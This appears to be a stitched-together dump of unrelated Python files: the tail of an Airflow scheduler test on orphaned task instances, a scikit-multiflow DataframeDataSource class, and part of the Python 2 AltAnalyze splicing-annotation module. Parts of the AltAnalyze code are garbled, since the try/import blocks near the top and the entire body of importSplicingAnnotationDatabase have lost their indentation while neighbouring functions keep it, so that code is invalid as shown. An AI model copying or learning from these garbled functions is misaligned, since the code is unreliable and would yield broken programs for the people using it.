    # A SUCCESS dagrun is not eligible for orphan resetting.
    dr1.state = State.SUCCESS
    tis = dr1.get_task_instances(session=session)
    # assertEquals is a deprecated unittest alias; use assertEqual.
    self.assertEqual(1, len(tis))
    tis[0].state = State.SCHEDULED
    session.merge(dr1)
    session.merge(tis[0])
    session.commit()
    self.assertEqual(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_with_orphans(self):
    """Create dagruns and ensure only ones with correct states are reset."""
    prefix = 'scheduler_job_test_test_reset_orphaned_tasks'
    # One task per state; only QUEUED/SCHEDULED/NONE in a RUNNING dagrun
    # are expected to be reset.
    states = [State.QUEUED, State.SCHEDULED, State.NONE, State.RUNNING, State.SUCCESS]
    states_to_reset = [State.QUEUED, State.SCHEDULED, State.NONE]
    dag = DAG(dag_id=prefix,
              start_date=DEFAULT_DATE,
              schedule_interval="@daily")
    tasks = []
    for i in range(len(states)):
        task_id = "{}_task_{}".format(prefix, i)
        task = DummyOperator(task_id=task_id, dag=dag)
        tasks.append(task)
    scheduler = SchedulerJob()
    session = settings.Session()
    # create dagruns
    dr1 = scheduler.create_dag_run(dag)
    dr2 = scheduler.create_dag_run(dag)
    dr1.state = State.RUNNING
    dr2.state = State.SUCCESS
    session.merge(dr1)
    session.merge(dr2)
    session.commit()
    # create taskinstances and set states
    dr1_tis = []
    dr2_tis = []
    for i, (task, state) in enumerate(zip(tasks, states)):
        ti1 = TI(task, dr1.execution_date)
        ti2 = TI(task, dr2.execution_date)
        ti1.refresh_from_db()
        ti2.refresh_from_db()
        ti1.state = state
        ti2.state = state
        dr1_tis.append(ti1)
        dr2_tis.append(ti2)
        session.merge(ti1)
        session.merge(ti2)
    session.commit()
    # QUEUED/SCHEDULED in dr1 count as orphans (NONE does not add to the
    # returned list but is also left as NONE).
    self.assertEqual(2, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
    for ti in dr1_tis + dr2_tis:
        ti.refresh_from_db()
    # running dagrun should be reset
    for state, ti in zip(states, dr1_tis):
        if state in states_to_reset:
            self.assertIsNone(ti.state)
        else:
            self.assertEqual(state, ti.state)
    # otherwise not
    for state, ti in zip(states, dr2_tis):
        self.assertEqual(state, ti.state)
    for state, ti in zip(states, dr1_tis):
        ti.state = state
    session.commit()
    scheduler.reset_state_for_orphaned_tasks(filter_by_dag_run=dr1, session=session)
    # check same for dag_run version
    for state, ti in zip(states, dr2_tis):
        self.assertEqual(state, ti.state)
    session.close()
|
dataframe_data_source.py | from skmultiflow.data.source.data_source import DataSource
import threading
class DataframeDataSource(DataSource):
    """ DataframeDataSource class.
    Provides a DataSource implementation, reading from a dataframe.
    Parameters
    ----------
    dataframe: pd.DataFrame (Default=None)
        The features' columns and targets' columns or the feature columns
        only if they are passed separately.
    """

    def __init__(self, record_to_dictionary, observers, dataframe):
        super().__init__(record_to_dictionary, observers)
        self.dataframe = dataframe
        self.name = "DataframeDataSource"  # TODO: can we md5 hash the content?
        self._prepare_for_use()

    def _prepare_for_use(self):
        """ Prepares the data source to be used """
        # Nothing to set up: the dataframe is already fully in memory.

    def listen_for_events(self):
        """ Stream the dataframe rows to observers on a background daemon thread. """
        worker = threading.Thread(target=self.read_content, args=())
        worker.daemon = True
        worker.start()

    def read_content(self):
        """ Emit each dataframe row as an event, in order. """
        for _, record in self.dataframe.iterrows():
            self.on_new_event(record)

    def get_info(self):
        observer_names = [observer.get_name() for observer in self.observers]
        return "DataframeDataSource; observers: {}".format(observer_names)
|
AltAnalyze.py | ###AltAnalyze
#Copyright 2005-2008 J. David Gladstone Institutes, San Francisco California
#Author Nathan Salomonis - nsalomonis@gmail.com
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is furnished
#to do so, subject to the following conditions:
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
#INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A
#PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
#HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
#OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
#SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import math
#import pkg_resources
#import distutils
from stats_scripts import statistics
import sys, string
import os.path
import unique
import update
import UI
import copy
import export; reload(export)
import ExpressionBuilder; reload(ExpressionBuilder)
from build_scripts import ExonAnalyze_module; reload(ExonAnalyze_module)
from import_scripts import ExonAnnotate_module; reload(ExonAnnotate_module)
from import_scripts import ResultsExport_module
from build_scripts import FeatureAlignment
import GO_Elite
import time
import webbrowser
import random
import traceback
import shutil
try:
import multiprocessing as mlp
except Exception:
mlp=None
print 'Note: Multiprocessing not supported for this verison python.'
try:
from scipy import stats
except Exception:
pass ### scipy is not required but is used as a faster implementation of Fisher Exact Test when present
try:
from PIL import Image as PIL_Image
try: import ImageTk
except Exception: from PIL import ImageTk
import PIL._imaging
import PIL._imagingft
except Exception:
print traceback.format_exc()
pass #print 'Python Imaging Library not installed... using default PNG viewer'
use_Tkinter = 'no'
debug_mode = 'no'
analysis_start_time = time.time()
# Flatten argv to sniff the invocation style: multiple arguments containing
# flags but no explicit --GUI switch means a headless command-line run.
command_args = string.join(sys.argv,' ')
if len(sys.argv[1:])>1 and '-' in command_args and '--GUI' not in command_args:
    runningCommandLine = True
else:
    runningCommandLine = False
def filepath(filename):
    """Resolve *filename* to a full path via the unique module's resolver."""
    return unique.filepath(filename)
def read_directory(sub_dir):
    """Return the data files in *sub_dir* with a .txt/.csv/.TXT extension.

    Folder names are excluded implicitly because they lack one of the
    recognized 4-character suffixes.
    """
    dir_list = unique.read_directory(sub_dir)
    # Comprehension replaces the original append loop; the suffix test is
    # identical to the original three slice comparisons.
    return [entry for entry in dir_list
            if entry[-4:] in ('.txt', '.csv', '.TXT')]
def eliminate_redundant_dict_values(database):
    """Return a new dict mapping each key of *database* to its sorted,
    de-duplicated value list."""
    deduped = {}
    for key in database:
        values = unique.unique(database[key])
        values.sort()
        deduped[key] = values
    return deduped
def makeUnique(item):
    """Return the sorted unique entries of *item*.

    Hashable entries are de-duplicated directly; unhashable (list) entries
    are keyed by their tuple form and converted back to lists on output.
    """
    seen = {}
    contains_lists = 0
    for entry in item:
        try:
            seen[entry] = []
        except TypeError:
            # Lists are unhashable: store the tuple form and remember to
            # convert back when building the result.
            seen[tuple(entry)] = []
            contains_lists = 1
    if contains_lists == 0:
        result = [entry for entry in seen]
    else:
        result = [list(entry) for entry in seen]
    result.sort()
    return result
def cleanUpLine(line):
    """Strip newline and carriage-return characters, literal backslash-c
    sequences, and double quotes from *line*."""
    # str methods replace the Python-2-only string-module functions (which no
    # longer exist in Python 3); behavior is identical.
    line = line.replace('\n', '')
    # The original wrote '\c', which is not a valid escape and silently meant
    # the two characters backslash + 'c'; spell that explicitly.
    line = line.replace('\\c', '')
    data = line.replace('\r', '')
    data = data.replace('"', '')
    return data
def returnLargeGlobalVars():
    ### Prints all large global variables retained in memory (taking up space)
    # Skip dunder names; anything without len() (ints, modules) is ignored
    # by the broad except below.
    all = [var for var in globals() if (var[:2], var[-2:]) != ("__", "__")]
    for var in all:
        try:
            if len(globals()[var])>500:
                print var, len(globals()[var])
        except Exception: null=[]
def clearObjectsFromMemory(db_to_clear):
    """Empty *db_to_clear* in place (a dict is cleared key by key; a list of
    unhashable entries is left untouched) to release memory."""
    key_snapshot = {}
    try:
        # Snapshot the keys first so we do not mutate while iterating.
        for entry in db_to_clear:
            key_snapshot[entry] = []
    except Exception:
        # Entries are unhashable (db_to_clear is a list of lists): just drop
        # the local references.
        for entry in db_to_clear:
            del entry
    for entry in key_snapshot:
        try:
            del db_to_clear[entry]
        except Exception:
            try:
                # For lists of tuples, drop each element reference.
                for element in entry:
                    del element
            except Exception:
                del entry
def importGeneric(filename):
    """Parse a tab-delimited file into {first column: list of remaining columns}.

    Later duplicate keys overwrite earlier ones.
    """
    fn = filepath(filename)
    key_db = {}
    # 'with' closes the handle deterministically (the original leaked it);
    # direct iteration replaces the removed-in-Python-3 xreadlines(), and
    # str.split replaces the Python-2-only string.split.
    with open(fn, 'rU') as infile:
        for line in infile:
            data = cleanUpLine(line)
            t = data.split('\t')
            key_db[t[0]] = t[1:]
    return key_db
def importGenericFiltered(filename,filter_db):
    """Parse a tab-delimited file into {first column: remaining columns},
    keeping only rows whose key is present in filter_db."""
    fn=filepath(filename); key_db = {}
    for line in open(fn,'rU').xreadlines():
        data = cleanUpLine(line)
        t = string.split(data,'\t')
        key = t[0]
        if key in filter_db: key_db[key] = t[1:]
    return key_db
def importGenericFilteredDBList(filename,filter_db):
    """Parse a tab-delimited file into {key: [second-column values]},
    keeping only keys present in filter_db."""
    fn=filepath(filename); key_db = {}
    for line in open(fn,'rU').xreadlines():
        data = cleanUpLine(line)
        t = string.split(data,'\t')
        try:
            # Membership probe: raises KeyError (caught below) when the key
            # is absent from filter_db, skipping the row.
            null=filter_db[t[0]]
            try: key_db[t[0]].append(t[1])
            except KeyError: key_db[t[0]] = [t[1]]
        except Exception: null=[]
    return key_db
def importGenericDBList(filename):
    """Parse a tab-delimited file into {first column: [second-column values]}.

    Values for repeated keys accumulate in order of appearance.
    """
    fn = filepath(filename)
    key_db = {}
    # 'with' closes the handle deterministically (the original leaked it);
    # setdefault replaces the try/except-KeyError append idiom, and str.split
    # replaces the Python-2-only string.split.
    with open(fn, 'rU') as infile:
        for line in infile:
            data = cleanUpLine(line)
            t = data.split('\t')
            key_db.setdefault(t[0], []).append(t[1])
    return key_db
def importExternalDBList(filename):
    """Parse a tab-delimited file into {first column: [lists of the remaining
    columns]}, accumulating rows that share a key."""
    fn=filepath(filename); key_db = {}
    for line in open(fn,'rU').xreadlines():
        data = cleanUpLine(line)
        t = string.split(data,'\t')
        try: key_db[t[0]].append(t[1:])
        except Exception: key_db[t[0]] = [t[1:]]
    return key_db
def FindDir(dir,term):
    """Return the directory entry exactly matching *term*; failing that, the
    last (reverse-sorted) entry containing *term*; failing that, ''."""
    entries = unique.read_directory(dir)
    entries.sort()
    matches = [entry for entry in entries if term == entry]
    if len(matches) == 0:
        # Fall back to substring matches when there is no exact match.
        matches = [entry for entry in entries if term in entry]
    matches.sort()
    matches.reverse()
    if len(matches) > 0:
        return matches[0]
    return ''
def openFile(file_dir):
    """Open *file_dir* with the platform's default viewer; no-op when running
    from the command line."""
    if runningCommandLine:
        return
    if os.name == 'nt':
        # Windows: prefer the shell association; fall back to 'open'.
        try:
            os.startfile('"'+file_dir+'"')
        except Exception:
            os.system('open "'+file_dir+'"')
    elif 'darwin' in sys.platform:
        os.system('open "'+file_dir+'"')
    elif 'linux' in sys.platform:
        os.system('xdg-open "'+file_dir+'"')
def openCytoscape(parent_dir,application_dir,application_name):
    """Locate a bundled Cytoscape install under parent_dir and launch it.
    On Linux, tries the jar via java directly, then the desktop launcher,
    then the raw binary; elsewhere, opens the application file directly."""
    cytoscape_dir = FindDir(parent_dir,application_dir); cytoscape_dir = filepath(parent_dir+'/'+cytoscape_dir)
    app_dir = FindDir(cytoscape_dir,application_name)
    app_dir = cytoscape_dir+'/'+app_dir
    if 'linux' in sys.platform:
        app_dir = app_dir
        app_dir2 = cytoscape_dir+'/Cytoscape'
        try: createCytoscapeDesktop(cytoscape_dir)
        except Exception: null=[]
        dir_list = unique.read_directory('/usr/bin/') ### Check to see that JAVA is installed
        if 'java' not in dir_list: print 'Java not referenced in "usr/bin/. If not installed,\nplease install and re-try opening Cytoscape'
        try:
            jar_path = cytoscape_dir+'/cytoscape.jar'
            main_path = cytoscape_dir+'/cytoscape.CyMain'
            plugins_path = cytoscape_dir+'/plugins'
            # Launch in the background (&) so this process is not blocked.
            os.system('java -Dswing.aatext=true -Xss5M -Xmx512M -jar '+jar_path+' '+main_path+' -p '+plugins_path+' &')
            print 'Cytoscape jar opened:',jar_path
        except Exception:
            print 'OS command to open Java failed.'
            try:
                try: openFile(app_dir2); print 'Cytoscape opened:',app_dir2
                except Exception:
                    # Make the launcher executable and retry.
                    os.chmod(app_dir,0777)
                    openFile(app_dir2)
            except Exception:
                try: openFile(app_dir)
                except Exception:
                    os.chmod(app_dir,0777)
                    openFile(app_dir)
    else:
        try: openFile(app_dir)
        except Exception:
            os.chmod(app_dir,0777)
            openFile(app_dir)
def createCytoscapeDesktop(cytoscape_dir):
    """Write a freedesktop Cytoscape.desktop launcher file into *cytoscape_dir*."""
    cyto_ds_output = cytoscape_dir+'/Cytoscape.desktop'
    data = export.ExportFile(cyto_ds_output)
    cytoscape_desktop = cytoscape_dir+'/Cytoscape'; #cytoscape_desktop = '/hd3/home/nsalomonis/Cytoscape_v2.6.1/Cytoscape'
    cytoscape_png = cytoscape_dir+ '/.install4j/Cytoscape.png'; #cytoscape_png = '/hd3/home/nsalomonis/Cytoscape_v2.6.1/.install4j/Cytoscape.png'
    # Emit the launcher entries line by line, identical to the original output.
    for entry in ['[Desktop Entry]',
                  'Type=Application',
                  'Name=Cytoscape',
                  'Exec=/bin/sh "'+cytoscape_desktop+'"',
                  'Icon='+cytoscape_png,
                  'Categories=Application;']:
        data.write(entry+'\n')
    data.close()
########### Parse Input Annotations ###########
def ProbesetCalls(array_type,probeset_class,splice_event,constitutive_call,external_exonid):
    """Decide whether a probeset is included in the analysis and whether it
    counts as constitutive, based on the module-level filter globals
    `filter_probesets_by` and `avg_all_for_ss`. Returns
    (include_probeset, constitutive_call), both 'yes'/'no' strings."""
    include_probeset = 'yes'
    if array_type == 'AltMouse':
        # For AltMouse arrays the splice_event field carries the exon ID.
        exonid = splice_event
        if filter_probesets_by == 'exon':
            if '-' in exonid or '|' in exonid: ###Therfore the probeset represents an exon-exon junction or multi-exon probeset
                include_probeset = 'no'
        if filter_probesets_by != 'exon':
            if '|' in exonid: include_probeset = 'no'
        if constitutive_call == 'yes': include_probeset = 'yes'
    else:
        # Core probesets (or ones with external exon evidence) may be promoted
        # to constitutive when averaging all probesets for steady-state.
        if avg_all_for_ss == 'yes' and (probeset_class == 'core' or len(external_exonid)>2): constitutive_call = 'yes'
        #if len(splice_event)>2 and constitutive_call == 'yes' and avg_all_for_ss == 'no': constitutive_call = 'no'
        if constitutive_call == 'no' and len(splice_event)<2 and len(external_exonid)<2: ###otherwise these are interesting probesets to keep
            if filter_probesets_by != 'full':
                if filter_probesets_by == 'extended':
                    if probeset_class == 'full': include_probeset = 'no'
                elif filter_probesets_by == 'core':
                    if probeset_class != 'core': include_probeset = 'no'
    return include_probeset,constitutive_call
def EvidenceOfAltSplicing(slicing_annot):
    """Return 1 when *slicing_annot* suggests alternative splicing, else 0.

    A primary-term hit is overridden when the annotation looks like a mere
    C-terminal/bleed-through difference paired with an N-terminal or Promoter
    change, unless a secondary term still indicates splicing.
    """
    primary_terms = ["ntron","xon","strangeSplice","Prime","3","5","C-term"]
    secondary_terms = ["ntron","assette","strangeSplice","Prime","3","5"]
    as_call = 1 if any(term in slicing_annot for term in primary_terms) else 0
    if as_call == 1:
        n_term_or_promoter = "N-" in slicing_annot or "Promoter" in slicing_annot
        if "C-term" in slicing_annot and n_term_or_promoter:
            as_call = 1 if any(term in slicing_annot for term in secondary_terms) else 0
        elif "bleed" in slicing_annot and n_term_or_promoter:
            as_call = 1 if any(term in slicing_annot for term in secondary_terms) else 0
    return as_call
########### Begin Analyses ###########
class SplicingAnnotationData:
    """Base accessor class for probeset splicing annotations.

    Subclasses populate the underscore-prefixed attributes that the getters
    below read; several accessors also consult the module-level globals
    `array_type` and `annotate_db` set during the analysis run.
    """
    def ArrayType(self):
        # Caches the module-level global `array_type` on the instance.
        self._array_type = array_type
        return self._array_type
    def Probeset(self): return self._probeset
    def setProbeset(self,probeset): self._probeset = probeset
    def ExonID(self): return self._exonid
    def setDisplayExonID(self,exonid): self._exonid = exonid
    def GeneID(self): return self._geneid
    def Symbol(self):
        # Empty string when the gene has no entry in the global annotate_db.
        symbol = ''
        if self.GeneID() in annotate_db:
            y = annotate_db[self.GeneID()]
            symbol = y.Symbol()
        return symbol
    def ExternalGeneID(self): return self._external_gene
    def ProbesetType(self):
        ###e.g. Exon, junction, constitutive(gene)
        return self._probeset_type
    def GeneStructure(self): return self._block_structure
    def SecondaryExonID(self): return self._block_exon_ids
    def setSecondaryExonID(self,ids): self._block_exon_ids = ids
    def setLocationData(self, chromosome, strand, probeset_start, probeset_stop):
        self._chromosome = chromosome; self._strand = strand
        self._start = probeset_start; self._stop = probeset_stop
    def LocationSummary(self):
        # e.g. "chr1:1000-2000(+)"; start/stop are stored as strings.
        location = self.Chromosome()+':'+self.ProbeStart()+'-'+self.ProbeStop()+'('+self.Strand()+')'
        return location
    def Chromosome(self): return self._chromosome
    def Strand(self): return self._strand
    def ProbeStart(self): return self._start
    def ProbeStop(self): return self._stop
    def ProbesetClass(self):
        ###e.g. core, extendended, full
        # NOTE(review): attribute name '_probest_class' looks misspelled
        # ('_probeset_class'?) and no setter is visible here — confirm.
        return self._probest_class
    def ExternalExonIDs(self): return self._external_exonids
    def ExternalExonIDList(self):
        # The external exon IDs are stored as a '|'-delimited string.
        external_exonid_list = string.split(self.ExternalExonIDs(),'|')
        return external_exonid_list
    def Constitutive(self): return self._constitutive_status
    def setTranscriptCluster(self,secondary_geneid): self._secondary_geneid = secondary_geneid
    def setNovelExon(self,novel_exon): self._novel_exon = novel_exon
    def NovelExon(self): return self._novel_exon
    def SecondaryGeneID(self): return self._secondary_geneid
    def setExonRegionID(self,exon_region): self._exon_region = exon_region
    def ExonRegionID(self): return self._exon_region
    def SplicingEvent(self):
        splice_event = self._splicing_event
        if len(splice_event)!=0:
            # Drop a leading '|' delimiter left over from annotation joining.
            if splice_event[0] == '|': splice_event = splice_event[1:]
        return splice_event
    def SplicingCall(self): return self._splicing_call
    def SpliceJunctions(self): return self._splice_junctions
    def Delete(self): del self
    def Report(self):
        output = self.ArrayType() +'|'+ self.ExonID() +'|'+ self.ExternalGeneID()
        return output
    def __repr__(self): return self.Report()
class AltMouseData(SplicingAnnotationData):
    """Splicing annotation record for AltMouse array probesets.

    AltMouse probesets lack Ensembl exon evidence, so several fields default
    to 'NA'/empty; only gene-level probesets are treated as constitutive.
    """
    def __init__(self,affygene,exons,ensembl,block_exon_ids,block_structure,probe_type_call):
        self._geneid = affygene
        self._external_gene = ensembl
        self._exonid = exons
        self._probeset_type = probe_type_call
        self._block_structure = block_structure
        self._block_exon_ids = block_exon_ids
        self._external_exonids = 'NA'
        self._splicing_event = ''
        # The original assigned ensembl here and immediately overwrote it
        # with 'NA'; the dead store is removed, keeping the final value.
        self._secondary_geneid = 'NA'
        self._exon_region = ''
        # (Also removed: a redundant early `_constitutive_status = 'no'`
        # that this if/else always overwrote.)
        if self._probeset_type == 'gene':
            self._constitutive_status = 'yes'
        else:
            self._constitutive_status = 'no'
class AffyExonSTData(SplicingAnnotationData):
    """Full splicing annotation record for Affymetrix Exon ST probesets."""
    def __init__(self,ensembl_gene_id,exon_id,ens_exon_ids, constitutive_call_probeset, exon_region, splicing_event, splice_junctions, splicing_call):
        self._geneid = ensembl_gene_id
        self._external_gene = ensembl_gene_id
        self._exonid = exon_id
        self._constitutive_status = constitutive_call_probeset
        self._external_exonids = ens_exon_ids
        self._exon_region = exon_region
        self._splicing_event = splicing_event
        self._splice_junctions = splice_junctions
        self._splicing_call = splicing_call
        # The first letter of the exon ID encodes the probeset's context.
        prefix = self._exonid[0]
        if prefix == 'U':
            self._probeset_type = 'UTR'
        elif prefix == 'E':
            self._probeset_type = 'exonic'
        elif prefix == 'I':
            self._probeset_type = 'intronic'
class AffyExonSTDataAbbreviated(SplicingAnnotationData):
    """Memory-light annotation record: gene ID, exon ID and splicing call only."""
    def __init__(self,ensembl_gene_id,exon_id,splicing_call):
        self._geneid = ensembl_gene_id
        self._exonid = exon_id
        self._splicing_call = splicing_call
def importSplicingAnnotations(array_type,Species,probeset_type,avg_ss_for_all,root_dir):
    """Load probeset/junction splicing annotations for the given array type.

    Installs several module-level globals consumed elsewhere in the analysis
    and returns (exon_db, constitutive_probeset_db).
    """
    global filter_probesets_by; filter_probesets_by = probeset_type
    global species; species = Species; global avg_all_for_ss; avg_all_for_ss = avg_ss_for_all; global exon_db; exon_db={}
    global summary_data_db; summary_data_db={}; global remove_intronic_junctions; remove_intronic_junctions = 'no'
    # NOTE(review): only the RNASeq path is anchored at root_dir; the array
    # path is relative to the working directory — confirm this is intentional.
    if array_type == 'RNASeq':
        probeset_annotations_file = root_dir+'AltDatabase/'+species+'/'+array_type+'/'+species+'_Ensembl_junctions.txt'
    else: probeset_annotations_file = 'AltDatabase/'+species+'/'+array_type+'/'+species+'_Ensembl_probesets.txt'
    filtered_arrayids={};filter_status='no'
    constitutive_probeset_db,exon_db,genes_being_analyzed = importSplicingAnnotationDatabase(probeset_annotations_file,array_type,filtered_arrayids,filter_status)
    return exon_db, constitutive_probeset_db
def importSplicingAnnotationDatabase(filename,array_type,filtered_arrayids,filter_status):
begin_time = time.time()
probesets_included_by_new_evidence = 0; export_exon_regions = 'yes'
if 'fake' in array_type: array_type = string.replace(array_type,'-fake',''); original_arraytype = 'RNASeq'
else: original_arraytype = array_type
if filter_status == 'no': global gene_transcript_cluster_db; gene_transcript_cluster_db={}; gene_transcript_cluster_db2={}; global last_exon_region_db; last_exon_region_db = {}
else: new_exon_db={}
fn=filepath(filename)
last_gene = ' '; last_exon_region = ''
constitutive_probeset_db = {}; constitutive_gene = {}
count = 0; x = 0; constitutive_original = {}
#if filter_status == 'yes': exon_db = {}
if array_type == 'AltMouse':
for line in open(fn,'rU').xreadlines():
probeset_data = cleanUpLine(line) #remove endline
probeset,affygene,exons,transcript_num,transcripts,probe_type_call,ensembl,block_exon_ids,block_structure,comparison_info = string.split(probeset_data,'\t')
###note: currently exclude comparison_info since not applicable for existing analyses
if x == 0: x = 1
else:
if exons[-1] == '|': exons = exons[0:-1]
if affygene[-1] == '|': affygene = affygene[0:-1]; constitutive_gene[affygene]=[]
if probe_type_call == 'gene': constitutive_call = 'yes' #looked through the probe annotations and the gene seems to be the most consistent constitutive feature
else: constitutive_call = 'no'
include_call,constitutive_call = ProbesetCalls(array_type,'',exons,constitutive_call,'')
if include_call == 'yes':
probe_data = AltMouseData(affygene,exons,ensembl,block_exon_ids,block_structure,probe_type_call) #this used to just have affygene,exon in the values (1/17/05)
exon_db[probeset] = probe_data
if filter_status == 'yes': new_exon_db[probeset] = probe_data
if constitutive_call == 'yes': constitutive_probeset_db[probeset] = affygene
genes_being_analyzed = constitutive_gene
else:
for line in open(fn,'rU').xreadlines():
probeset_data = cleanUpLine(line) #remove endline
if x == 0: x = 1
else:
try: probeset_id, exon_id, ensembl_gene_id, transcript_cluster_id, chromosome, strand, probeset_start, probeset_stop, affy_class, constitutive_call_probeset, external_exonid, ens_const_exons, exon_region, exon_region_start, exon_region_stop, splicing_event, splice_junctions = string.split(probeset_data,'\t')
except Exception: print probeset_data;force_error
if affy_class == 'free': affy_class = 'full' ### Don't know what the difference is
include_call,constitutive_call = ProbesetCalls(array_type,affy_class,splicing_event,constitutive_call_probeset,external_exonid)
#if 'ENSG00000163904:E11.5' in probeset_id: print probeset_data
#print array_type,affy_class,splicing_event,constitutive_call_probeset,external_exonid,constitutive_call,include_call;kill
if array_type == 'junction' and '.' not in exon_id: exon_id = string.replace(exon_id,'-','.'); exon_region = string.replace(exon_region,'-','.')
if ensembl_gene_id != last_gene: new_gene = 'yes'
else: new_gene = 'no'
if filter_status == 'no' and new_gene == 'yes':
if '.' in exon_id: ### Exclude junctions
if '-' not in last_exon_region and 'E' in last_exon_region: last_exon_region_db[last_gene] = last_exon_region
else: last_exon_region_db[last_gene] = last_exon_region
last_gene = ensembl_gene_id
if len(exon_region)>1: last_exon_region = exon_region ### some probeset not linked to an exon region
###Record the transcript clusters assoicated with each gene to annotate the results later on
if constitutive_call_probeset!=constitutive_call: probesets_included_by_new_evidence +=1#; print probeset_id,[splicing_event],[constitutive_call_probeset];kill
proceed = 'no'; as_call = 0
if array_type == 'RNASeq' or array_type == 'junction': include_call = 'yes' ### Constitutive expression is not needed
if remove_intronic_junctions == 'yes':
if 'E' not in exon_id: include_call = 'no' ### Remove junctions that only have splice-sites within an intron or UTR
if include_call == 'yes' or constitutive_call == 'yes':
#if proceed == 'yes':
as_call = EvidenceOfAltSplicing(splicing_event)
if filter_status == 'no':
probe_data = AffyExonSTDataAbbreviated(ensembl_gene_id, exon_id, as_call)
if array_type != 'RNASeq':
probe_data.setTranscriptCluster(transcript_cluster_id)
try:
if export_exon_regions == 'yes':
probe_data.setExonRegionID(exon_region)
except Exception: null=[]
else:
probe_data = AffyExonSTData(ensembl_gene_id, exon_id, external_exonid, constitutive_call, exon_region, splicing_event, splice_junctions, as_call)
probe_data.setLocationData(chromosome, strand, probeset_start, probeset_stop)
if array_type != 'RNASeq':
probe_data.setTranscriptCluster(transcript_cluster_id)
else:
probe_data.setNovelExon(affy_class)
if filter_status == 'yes':
try: ### saves memory
null = filtered_arrayids[probeset_id]
new_exon_db[probeset_id] = probe_data
except KeyError: null = []
else: exon_db[probeset_id] = probe_data
if constitutive_call == 'yes' and filter_status == 'no': ###only perform function when initially running
constitutive_probeset_db[probeset_id] = ensembl_gene_id
try: constitutive_gene[ensembl_gene_id].append(probeset_id)
except Exception: constitutive_gene[ensembl_gene_id] = [probeset_id]
###Only consider transcript clusters that make up the constitutive portion of the gene or that are alternatively regulated
if array_type != 'RNASeq':
try: gene_transcript_cluster_db[ensembl_gene_id].append(transcript_cluster_id)
except KeyError: gene_transcript_cluster_db[ensembl_gene_id] = [transcript_cluster_id]
if constitutive_call_probeset == 'yes' and filter_status == 'no': ###only perform function when initially running
try: constitutive_original[ensembl_gene_id].append(probeset_id)
except KeyError: constitutive_original[ensembl_gene_id] = [probeset_id]
if array_type != 'RNASeq':
try: gene_transcript_cluster_db2[ensembl_gene_id].append(transcript_cluster_id)
except KeyError: gene_transcript_cluster_db2[ensembl_gene_id] = [transcript_cluster_id]
###If no constitutive probesets for a gene as a result of additional filtering (removing all probesets associated with a splice event), add these back
original_probesets_add = 0; genes_being_analyzed = {}
for gene in constitutive_gene: genes_being_analyzed[gene]=[]
for gene in constitutive_original:
if gene not in constitutive_gene:
genes_being_analyzed[gene] = [gene]
constitutive_gene[gene]=[]
original_probesets_add +=1
gene_transcript_cluster_db[gene] = gene_transcript_cluster_db2[gene]
for probeset in constitutive_original[gene]: constitutive_probeset_db[probeset] = gene
#if array_type == 'junction' or array_type == 'RNASeq':
### Added the below in 1.16!!!
### If no constitutive probesets for a gene assigned, assign all gene probesets
for probeset in exon_db:
gene = exon_db[probeset].GeneID()
proceed = 'no'
exonid = exon_db[probeset].ExonID()
### Rather than add all probesets, still filter based on whether the probeset is in an annotated exon
if 'E' in exonid and 'I' not in exonid and '_' not in exonid: proceed = 'yes'
if proceed == 'yes':
if gene not in constitutive_gene:
constitutive_probeset_db[probeset] = gene
genes_being_analyzed[gene] = [gene]
### DO NOT ADD TO constitutive_gene SINCE WE WANT ALL mRNA ALIGNING EXONS/JUNCTIONS TO BE ADDED!!!!
#constitutive_gene[gene]=[]
gene_transcript_cluster_db = eliminate_redundant_dict_values(gene_transcript_cluster_db)
#if affygene == 'ENSMUSG00000023089': print [abs(fold_change_log)],[log_fold_cutoff];kill
if array_type == 'RNASeq':
import RNASeq
try: last_exon_region_db = RNASeq.importExonAnnotations(species,'distal-exon','')
except Exception: null=[]
constitutive_original=[]; constitutive_gene=[]
#clearObjectsFromMemory(exon_db); constitutive_probeset_db=[];genes_being_analyzed=[] ### used to evaluate how much memory objects are taking up
#print 'remove_intronic_junctions:',remove_intronic_junctions
#print constitutive_gene['ENSMUSG00000031170'];kill ### Determine if avg_ss_for_all is working
if original_arraytype == 'RNASeq': id_name = 'exon/junction IDs'
else: id_name = 'array IDs'
print len(exon_db),id_name,'stored as instances of SplicingAnnotationData in memory'
#print len(constitutive_probeset_db),'array IDs stored as constititive'
#print probesets_included_by_new_evidence, 'array IDs were re-annotated as NOT constitutive based on mRNA evidence'
if array_type != 'AltMouse': print original_probesets_add, 'genes not viewed as constitutive as a result of filtering',id_name,'based on splicing evidence, added back'
end_time = time.time(); time_diff = int(end_time-begin_time)
#print filename,"import finished in %d seconds" % time_diff
if filter_status == 'yes': return new_exon_db
else:
summary_data_db['gene_assayed'] = len(genes_being_analyzed)
try: exportDenominatorGenes(genes_being_analyzed)
except Exception: null=[]
return constitutive_probeset_db,exon_db,genes_being_analyzed
def exportDenominatorGenes(genes_being_analyzed):
    """Write the denominator gene list for downstream GO-Elite analysis.

    Produces a two-column tab-delimited file (GeneID, SystemCode) at
    <root_dir>/GO-Elite/denominator/AS.denominator.txt. For AltMouse
    arrays, each gene ID is translated to its external gene ID via
    annotate_db when a mapping exists; otherwise the original ID is
    written unchanged. The SystemCode is always 'En' (Ensembl).

    Depends on module-level globals: root_dir, export, array_type,
    annotate_db.
    """
    output_path = root_dir + 'GO-Elite/denominator/AS.denominator.txt'
    out_file = export.ExportFile(output_path)
    system_code = 'En'
    out_file.write("GeneID\tSystemCode\n")
    translate_ids = (array_type == 'AltMouse')  # invariant across the loop
    for gene_id in genes_being_analyzed:
        if translate_ids:
            try:
                gene_id = annotate_db[gene_id].ExternalGeneID()
            except KeyError:
                pass  # no external mapping - keep the original identifier
        out_file.write(gene_id + '\t' + system_code + '\n')
